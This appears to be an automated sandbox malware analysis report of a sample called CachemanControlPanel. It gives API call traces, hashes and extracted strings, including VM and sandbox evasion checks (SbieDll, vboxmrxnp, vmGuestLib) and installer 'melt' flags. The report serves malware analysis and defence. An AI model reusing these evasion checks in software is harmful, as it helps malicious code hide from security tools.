                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: CharLower
                                                        • String ID: ://$Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 1615517891-740708298
                                                        • Opcode ID: f4689b3ee5d095cabfab1703e997065afb5c7fce1c32e2b2be06053163b71d4b
                                                        • Instruction ID: 084c16a66c849ce4fca715c936a354e24890b302862ae0a6bad428861d8d54c9
                                                        • Opcode Fuzzy Hash: f4689b3ee5d095cabfab1703e997065afb5c7fce1c32e2b2be06053163b71d4b
                                                        • Instruction Fuzzy Hash: EE21F376A083058BC710AF5D98405BBB7B0FF847A1F49056AED8893300E638EE45DBB9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Heapfreadfseek$AllocFreeftell
                                                        • String ID:
                                                        • API String ID: 1109645428-0
                                                        • Opcode ID: b5d1c404307008722dce6354acf4bab98ba5db22b678ed754315a30897d95242
                                                        • Instruction ID: d8dcd5c0fe382b30f642068d4789b420bd7b8f142926d17b473ca410bbbff52b
                                                        • Opcode Fuzzy Hash: b5d1c404307008722dce6354acf4bab98ba5db22b678ed754315a30897d95242
                                                        • Instruction Fuzzy Hash: 9E21BD71A00B00AFDB31AF15CC41B92B3F0FB44712F10492EF545A36A0E3B9E9D49B99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00418710: TlsGetValue.KERNEL32(00000022,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00404AE3,00000000), ref: 00418727
                                                        • LoadLibraryW.KERNEL32(.dll,00000000,00000000,00000000,00000000,?,004012CA,00433874,\ref.conf,02A804F8,00000000,installation,antis,00000000,00000000,00433880), ref: 00405AF1
                                                          • Part of subcall function 004187A0: HeapFree.KERNEL32(02A80000,00000000,00000000,?,00000000,?,0041FFFD,00000000,00000000,00000000), ref: 004187B8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: FreeHeapLibraryLoadValue
                                                        • String ID: .dll$SbieDll$pthreadVC$vboxmrxnp$vmGuestLib
                                                        • API String ID: 671220262-1336096769
                                                        • Opcode ID: 94328756cd8523f7bef57009d2dbdc5007e78e239842ba8846e401f586356074
                                                        • Instruction ID: aa2b340956360de76597681a5f4e8b04b19ef0628b8e3fa18d1737790e01e208
                                                        • Opcode Fuzzy Hash: 94328756cd8523f7bef57009d2dbdc5007e78e239842ba8846e401f586356074
                                                        • Instruction Fuzzy Hash: 5A118C74318300AAD700BA61C8C297FB3A5DF94308F20CE3FB0855A582DA3C9D959E2F
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: strstr$strlen
                                                        • String ID: ://
                                                        • API String ID: 1600229599-1869659232
                                                        • Opcode ID: 8755d747628641fc4eaeb87bb3ae8a7b7afd39ea878b54986d3951a4eadcd0f7
                                                        • Instruction ID: 9cd49c2b000f72edf8b78726718344312d50be720e9eb3a9c172630c8c6f5ac4
                                                        • Opcode Fuzzy Hash: 8755d747628641fc4eaeb87bb3ae8a7b7afd39ea878b54986d3951a4eadcd0f7
                                                        • Instruction Fuzzy Hash: 2C01B537604B252BD72665256C41E6BA2A9EE85760776043BFA04B37C4EF3CED0241ED
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateThread.KERNEL32 ref: 0040AA33
                                                        • EnterCriticalSection.KERNEL32(00434190,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,?,00404F65,00000000,00000000,&er=1,00000000,00000000,00000000,&env=,00000000,00000000,00000000), ref: 0040AA45
                                                        • WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,?,00404F65,00000000,00000000,&er=1,00000000,00000000,00000000,&env=,00000000), ref: 0040AA5C
                                                        • CloseHandle.KERNEL32(00000008,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,?,00404F65,00000000,00000000,&er=1,00000000,00000000,00000000,&env=,00000000,00000000,00000000), ref: 0040AA68
                                                          • Part of subcall function 004184AD: HeapFree.KERNEL32(00000000,-00000008,0040A9AD,00433914,00000008,?,?,00401C40,00401C26,00000000,00430024,00000002,installation,melt,00000000,00000000), ref: 004184E6
                                                        • LeaveCriticalSection.KERNEL32(00434190,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,?,00404F65,00000000,00000000,&er=1,00000000,00000000,00000000,&env=,00000000,00000000,00000000), ref: 0040AAAB
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 0040AA1B
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$CloseCreateEnterFreeHandleHeapLeaveObjectSingleThreadWait
                                                        • String ID: Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 3708593966-3176450862
                                                        • Opcode ID: f29892adba61d6632501d582b0dd8544b23aa32e8770617dcb23fdaec087b04f
                                                        • Instruction ID: 65ed5098b9e5cd2c6e6978fcabe992e980075ef59320fe1a943a06d220993a97
                                                        • Opcode Fuzzy Hash: f29892adba61d6632501d582b0dd8544b23aa32e8770617dcb23fdaec087b04f
                                                        • Instruction Fuzzy Hash: EE11A772200211AFD714AF55ED04E67BBA8EF48751720512BF81497290EBB45D91CE99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: strstr$strlen
                                                        • String ID: ://
                                                        • API String ID: 1600229599-1869659232
                                                        • Opcode ID: 5327235400316155df61653ff2e2c1186778f6510a2fef410859c32df4bd3241
                                                        • Instruction ID: f53babc7fef0ff7b45b3fff066183071ce2d12eaf28ca6a23346491e3e80fd36
                                                        • Opcode Fuzzy Hash: 5327235400316155df61653ff2e2c1186778f6510a2fef410859c32df4bd3241
                                                        • Instruction Fuzzy Hash: 4301F773B05B312AD72A55256C81E5B52C8DE45764722003FF905B32C0EF3C9D0209DD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(00434134,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00000000,00000000,0041244B,?,00000000,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00000000,?,00411D21,?,00000000,?,00406FC1,?), ref: 004182D5
                                                        • LeaveCriticalSection.KERNEL32(00434134,?,00411D21,?,00000000,?,00406FC1,?,00000000,00000000,00000000,?,FFFFFFFF,?,?,00000000), ref: 0041832A
                                                          • Part of subcall function 004182C1: HeapFree.KERNEL32(00000000,?,?,00411D21,?,00000000,?,00406FC1,?,00000000,00000000,00000000,?,FFFFFFFF,?,?), ref: 00418323
                                                        • DeleteCriticalSection.KERNEL32(00000020,00000000,00000000,00000000,0041244B,?,00000000,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00000000,?,00411D21,?,00000000,?,00406FC1,?), ref: 00418343
                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,0041244B,?,00000000,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00000000,?,00411D21,?,00000000,?,00406FC1), ref: 00418352
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 004182CE
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
                                                        • String ID: Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 3171405041-3176450862
                                                        • Opcode ID: a1d6ff9b9420ca61bb49accdd957426d605d4ddadb4ece1a1d052ab279f64fda
                                                        • Instruction ID: 19010fbf9cb8ba23d2b8811f4ded92570abf09322a556f0702dac86d86cc8bb6
                                                        • Opcode Fuzzy Hash: a1d6ff9b9420ca61bb49accdd957426d605d4ddadb4ece1a1d052ab279f64fda
                                                        • Instruction Fuzzy Hash: 44116D31101A05DFC728AF15E948B9BBBF4FF54702F18442EE95683220CB79A881CB58
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00412082
                                                        • SelectObject.GDI32(00000000,?), ref: 00412095
                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 004120B7
                                                        • DeleteDC.GDI32(00000000), ref: 004120BE
                                                        • DeleteDC.GDI32(?), ref: 004120CB
                                                        • DeleteObject.GDI32(?), ref: 004120DC
                                                        • GdiSetBatchLimit.GDI32(?), ref: 004120E8
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Delete$Object$BatchCompatibleCreateLimitSelect
                                                        • String ID:
                                                        • API String ID: 408043411-0
                                                        • Opcode ID: 7eb654bf28427414ab8bae5166c87a1fb384f2d45649617488611fbf3eb0212c
                                                        • Instruction ID: 645af82c45e2f8310a057cc87378489cec180b6db861871d1b92f4a1a251744e
                                                        • Opcode Fuzzy Hash: 7eb654bf28427414ab8bae5166c87a1fb384f2d45649617488611fbf3eb0212c
                                                        • Instruction Fuzzy Hash: 3401FB72201604EFC7221B61EE08FE7BEA9FF89341F05542AF29A81120CB766460EB24
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?), ref: 0040CB71
                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?), ref: 0040CBB2
                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,?), ref: 0040CBFC
                                                        • CreateFileW.KERNEL32(?,40000000,?,00000000,00000005,00000000,00000000), ref: 0040CC1E
                                                        • HeapAlloc.KERNEL32(00000000,00001000,?), ref: 0040CC57
                                                        • SetFilePointer.KERNEL32(?,00000000,?,00000002), ref: 0040CCAA
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: File$Create$AllocHeapPointer
                                                        • String ID:
                                                        • API String ID: 4207849991-0
                                                        • Opcode ID: 794090ebd384d7f14941866f14c70bd05677a27e7f71147f131c1db57209f8af
                                                        • Instruction ID: 287d703d32fe690a8e16c76b5cbdd554604a44036c2df8f946676b3293783a9d
                                                        • Opcode Fuzzy Hash: 794090ebd384d7f14941866f14c70bd05677a27e7f71147f131c1db57209f8af
                                                        • Instruction Fuzzy Hash: 7F51B4B1608300ABE3208F25ED85B277AE5EB44764F200A3AF955B73E0D7B9E8458759
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: memcpy
                                                        • String ID:
                                                        • API String ID: 3510742995-0
                                                        • Opcode ID: 146266741ae6cd853a77c5024080cb58a96640ee573b4baa164e31b08e97ba08
                                                        • Instruction ID: 7c9037d25d1962fb33e1b697db64366df65fb2d8c234d9406baaa4b4850b8cd7
                                                        • Opcode Fuzzy Hash: 146266741ae6cd853a77c5024080cb58a96640ee573b4baa164e31b08e97ba08
                                                        • Instruction Fuzzy Hash: DED18C716047059FC724DF69C8909ABB7E1FF88314B28892EE89A87701D779FC85CB49
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(00434134,0043412C,h4AC,00000000,?,?,77E34620,0040BFB1,?,00000010,00010000,00000004,?), ref: 004181D5
                                                        • HeapAlloc.KERNEL32(00000000,00000018), ref: 0041820C
                                                        • LeaveCriticalSection.KERNEL32(00434134), ref: 00418265
                                                        • HeapAlloc.KERNEL32(00000000,00000038,00000000,?,?,77E34620,0040BFB1,?,00000010,00010000,00000004,?), ref: 00418276
                                                        • InitializeCriticalSection.KERNEL32(00000020), ref: 004182B2
                                                        Strings
                                                        Memory Dump Source
